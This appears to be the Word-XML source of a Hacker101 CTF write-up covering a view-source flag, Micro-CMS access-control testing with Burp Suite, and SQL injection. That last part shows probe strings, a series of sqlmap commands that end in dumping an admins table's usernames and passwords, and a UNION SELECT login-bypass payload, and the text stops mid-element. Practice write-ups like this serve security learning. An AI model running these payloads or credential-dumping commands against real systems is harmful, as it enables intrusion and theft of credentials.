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acker101-ctf-write-up-documentation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hacker101 CTF Write-Up Documentation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contains a walkthrough of challenges completed on the Hacker101 CTF platform. It explains the methodology, tools used, vulnerabilities identified, and the process followed to retrieve the flags.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Xd3ba130dd335f57a5bd576b840ae1edb6e1859c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Challenge 1 — A little something to get you started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Web</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trivial</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22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Gain familiarity with the platform and retrieve the first flag.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="enumeration-process"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumeration Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Opened the web application in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inspected the page contents manually.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checked for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hidden text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTML comments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Page source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Developer tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basic directories</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="steps-taken"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Steps Taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Loaded the challenge page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Viewed the page source using:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> + U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inspected the HTML for hidden content or comments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Located the flag embedded in the source/page.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="flag-retrieval"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag Retrieval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The flag was retrieved directly from the HTML source after inspecting the page contents.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="skills-learned"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Skills Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basic web enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Viewing source code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recognizing hidden information in HTML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55" w:name="challenge-2-micro-cms-v1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Challenge 2 — Micro-CMS v1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Web</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Easy</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28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Identify vulnerabilities in the CMS and retrieve all available flags.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="tools-used"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browser Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Firefox</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="initial-enumeration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initial Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application appeared to be a small content management system with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Login functionality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post creation/editing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Potential administrative endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initial testing focused on:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hidden routes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Session behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="33" w:name="Xec8b6d835ba51946c6b103aa080f1bf8c848026"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag 1 — Information Disclosure / Source Inspection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="31" w:name="steps-taken-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Steps Taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inspected the web page source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checked for hidden comments and developer notes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerated directories and routes manually.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Located exposed information leading to the first flag.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="result"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully retrieved the first flag.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35b4bff0cbd369a3ceafd96293d0c75f90d9d7e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag 2 — Authentication / Access Control Issue</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="34" w:name="steps-taken-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Steps Taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intercepted requests using Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observed authentication/session behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested direct access to privileged endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modified requests and replayed them using Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="result-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessed restricted functionality and obtained the second flag.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1" w:name="flag-3-sql-injection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag 3 — SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="enumeration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observed parameters that interacted with backend content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested special characters such as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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" </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Noticed abnormal responses indicating possible SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="43" w:name="exploitation-workflow"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used sqlmap for automated exploitation and database enumeration.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="38" w:name="step-1-enumerate-databases"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Enumerate databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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request.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs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--threads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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--risk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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--level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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This identified available databases on the backend MariaDB/MySQL server.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="X944a51c65f12601c5071a1da7f6f9be9b4b0cc7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Enumerate tables from the target database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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req.txt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level2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--tables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--threads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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--risk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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--level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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The enumeration revealed multiple tables inside the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">level2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">database.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="X366ec6af93c187b79319bc9c760152373511228"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Identify credential-related tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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request.txt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level2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--tables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--threads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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--risk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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--level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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During enumeration, the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">table was identified as a likely credential storage table.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="X5410e5faf9019765967598d5ededaa1d59c5014"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 — Enumerate columns from the admins table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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request.txt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level2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admins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--columns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--technique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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This revealed columns such as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="step-5-dump-credentials"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5 — Dump credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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request.txt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level2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admins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username,password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump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--technique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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The usernames and password hashes/credentials were successfully extracted from the database.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="X1f815641e992a3cd1db712bce7b14ea6225ef14"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual SQL Injection Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During testing, a manual SQL injection payload was crafted to bypass authentication checks and retrieve administrator credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following payloads were tested against the login form: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admins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admins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Simplified SQL injection payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' AS password FROM admins WHERE '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' = '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Password used during testing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The payload manipulated the backend SQL query logic and successfully bypassed authentication validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
